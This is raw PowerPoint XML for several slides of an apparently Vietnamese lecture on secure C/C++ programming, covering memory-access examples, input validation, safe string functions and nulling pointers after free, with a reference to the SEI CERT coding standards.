                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEEC4F8B-FF04-4891-9D5A-D99D33DA1649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21714880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839-7792-DD0D-5EB5-3102F4C65102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Điều kiện truy cập bộ nhớ - Ví dụ</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC67C2F4-7266-D2A5-4176-A9B790EA92C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED0F593B-DE23-03FD-5592-8C537F31D77E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="609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a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ: Xác định các điều kiện truy cập bộ nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F639868-89E8-8C03-C4B0-45A611B38C48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1600200"/>
            <a:ext cx="7239000" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void displayArr(int a[], int n)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   for(int i = 0; i &lt; n; i += 1){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	  printf(“%d”, a[i]);}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">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33372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4E98-0214-4D6A-8B8A-247B2862F7D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Các nguyên tắc lập trình an toàn</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88ABD2E7-96AE-4D2D-AB18-93778081980D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Không tin cậy những thứ mà không do bạn tạo ra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Người dùng chỉ là những kẻ ngốc nghếch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Hàm gọi (Caller) = Người dùng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Hạn chế cho kẻ khác tiếp cận những gì quan trọng. Ví dụ: thành phần bên trong của một cấu trúc/đối tượng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Ngôn ngữ OOP: nguyên lý đóng gói</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Ngôn ngữ non-OOP: sử dụng token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Không bao giờ nói “không bao giờ”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Sau đây sẽ đề cập đến một số quy tắc trong C/C++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Về chủ đề lập trình an toàn, tham khảo tại đây:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>https://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05281C4A-FD17-45EF-97DF-B237EA392678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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val="1305098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3FCF-BCB8-4924-901C-45062E189D7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Kiểm tra mọi dữ liệu đầu vào</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DCBFC39-7BDC-4F9D-83F3-E8E21AD0BAB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Các giá trị do người dùng nhập</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>File được mở</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Các gói tin nhận được từ mạng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Các dữ liệu thu nhận từ thiết bị cảm biến (Ví dụ: QR code, âm thanh, hình ảnh,…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Thư viện của bên thứ 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Mã nguồn được cập nhật</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Khác…</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7608893-D634-4F4D-8364-23AA196D8A35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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val="9843193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838C-2320-4F4A-84DB-AFEDB5E72524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sử dụng các hàm xử lý xâu an toàn</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8ADB712-FCC0-4758-B2CE-F1948C05F7BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Sử dụng các hàm xử lý xâu an toàn thay cho các hàm thông dụng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>strcat, strncat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> strlcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>strcpy, strncpy  strlcpy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>gets  fgets, fprintf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Luôn đảm bảo xâu được kết thúc bằng ‘\0’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Nếu có thể, hãy sử dụng các thư viện an toàn hơn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Ví dụ: std::string trong C++</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F142D88-567B-47BE-A941-50D7FB17E1E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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6802811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417B-BCEB-4342-BB54-2E1C926F0602}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sử dụng con trỏ một cách an toàn</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78D696C9-8166-49E9-BB29-7FAC6665516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hiểu biết về các toán tử con trỏ: +, -, sizeof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cần xóa con trỏ về NULL sau khi giải phóng bộ nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>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0A723FA3-13BF-47E4-BC3E-3346F4B0BC76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A509D526-7602-4A47-AFB2-E14EE7AEB743}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2667000"/>
            <a:ext cx="7924800" cy="2739211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> x = 5;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *p = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *)malloc(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free(p);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="6F008A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> **q = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> **)malloc(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
